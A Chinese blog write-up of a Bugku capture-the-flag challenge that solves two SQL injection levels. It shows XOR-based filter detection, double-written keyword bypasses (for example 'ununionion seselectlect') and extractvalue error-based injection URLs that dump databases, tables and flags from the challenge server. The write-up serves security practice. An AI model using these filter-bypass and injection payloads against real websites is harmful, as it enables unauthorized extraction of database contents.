bugku-多次

待我称王封你为后i 2022-05-03 14:57 233阅读 0赞

![20181027223738687.png][]

这题分为两个关卡，都是sql注入的。第一关是关键字and、or、union、select过滤，第二关是报错注入。

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2R5d182NjY2NjY_size_27_color_FFFFFF_t_70][]

### 测试 ###

进入第一关没有什么提示信息，但是url地址栏 ?id=1 可能存在注入

id=1' 会报错，后面加--+注释返回正常，确定存在SQL注入

?id=1'or 1=1--+ 也报错，可能存在过滤

尝试双写绕过，?id=1'oorr 1=1--+ 返回正常

### 异或注入 ###

这时我们可以用**异或注入**来检测，异或即两个条件相同（同真或同假）即为假

http://123.206.87.240:9004/1ndex.php?id=1'^(length('and')!=0)--+

当**满足**异或条件就正常返显，There is nothing.

当**不满足**异或条件时，返回 Error! Error! Error!

可以测试出被过滤的字符串有：and，or，union，select

### 双写绕过 ###

这时我们可以用双写绕过。

猜字段数
    http://123.206.87.240:9004/1ndex.php?id=1' oorrder by 2 --+ 正常
    http://123.206.87.240:9004/1ndex.php?id=1' oorrder by 3 --+ 报错
    
    爆库
    http://123.206.87.240:9004/1ndex.php?id=-1' ununionion seselectlect 1,database() --+
    
    爆表
    http://123.206.87.240:9004/1ndex.php?id=-1' ununionion seselectlect
    1,group_concat(table_name) from infoorrmation_schema.tables 
    where table_schema="web1002-1"--+ （注意information_schema里也会过滤or）
    
    
    爆列
    http://123.206.87.240:9004/1ndex.php?id=-1' ununionion seselectlect 
    1,group_concat(column_name) from infoorrmation_schema.columns 
    where table_schema="web1002-1" and table_name="flag1"--+
    
    爆数据
    http://123.206.87.240:9004/1ndex.php?id=-1' ununionion seselectlect 
    1,group_concat(flag1) from flag1--+

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2R5d182NjY2NjY_size_27_color_FFFFFF_t_70 1][]

这是第一关的flag，不过是假的。因此我们只能爆出flag1中另一个address的数据。

爆第二关地址
    http://123.206.87.240:9004/1ndex.php?id=-1' ununionion seselectlect 
    1,group_concat(address) from flag1--+

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2R5d182NjY2NjY_size_27_color_FFFFFF_t_70 2][]

--------------------

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2R5d182NjY2NjY_size_27_color_FFFFFF_t_70 3][]

当双写绕过和大小写绕过都没用时，这时我们需要用到报错注入。

### 报错注入 ###

爆字段数
    http://123.206.87.240:9004/Once_More.php?id=1' order by 2--+ 正常
    http://123.206.87.240:9004/Once_More.php?id=1' order by 3--+ 报错
    
    
    爆库
    http://123.206.87.240:9004/Once_More.php?id=1' and
    (extractvalue(1,concat(0x7e,database(),0x7e)))--+
    
    
    爆表
    http://123.206.87.240:9004/Once_More.php?id=1' and 
    (extractvalue(1,concat(0x7e,
    (select group_concat(table_name) from information_schema.tables 
    where table_schema="web1002-2"),0x7e)))--+
    
    
    爆列
    http://123.206.87.240:9004/Once_More.php?id=1' and 
    (extractvalue(1,concat(0x7e,
    (select group_concat(column_name) from information_schema.columns 
    where table_schema="web1002-2" and table_name="flag2"),0x7e)))--+
    
    爆flag
    http://123.206.87.240:9004/Once_More.php?id=1' and 
    (extractvalue(1,concat(0x7e,
    (select group_concat(flag2) from flag2),0x7e)))--+

![20181027231125864.png][]

最后flag就出来了。

![20181027231357903.png][]

第三关地址。想知道有什么自己去看吧~

[20181027223738687.png]: /images/20220503/a90d3775dfd1448f97acfafd9e2ecb8a.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2R5d182NjY2NjY_size_27_color_FFFFFF_t_70]: /images/20220503/ce02cf8de079469fb18d903dad77a5ed.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2R5d182NjY2NjY_size_27_color_FFFFFF_t_70 1]: /images/20220503/f2cabf5ec9484130b0a73ecd4aaeb5a5.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2R5d182NjY2NjY_size_27_color_FFFFFF_t_70 2]: /images/20220503/16b6a8719aa84dbebfcf3e4a41309475.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2R5d182NjY2NjY_size_27_color_FFFFFF_t_70 3]: /images/20220503/d123cd9d9bb04fd7a215746e3b4c93b9.png
[20181027231125864.png]: /images/20220503/b2d0f827f4784fd68a97bcf7da1abbb9.png
[20181027231357903.png]: /images/20220503/658668112ed1485a91bb1f798eb674d5.png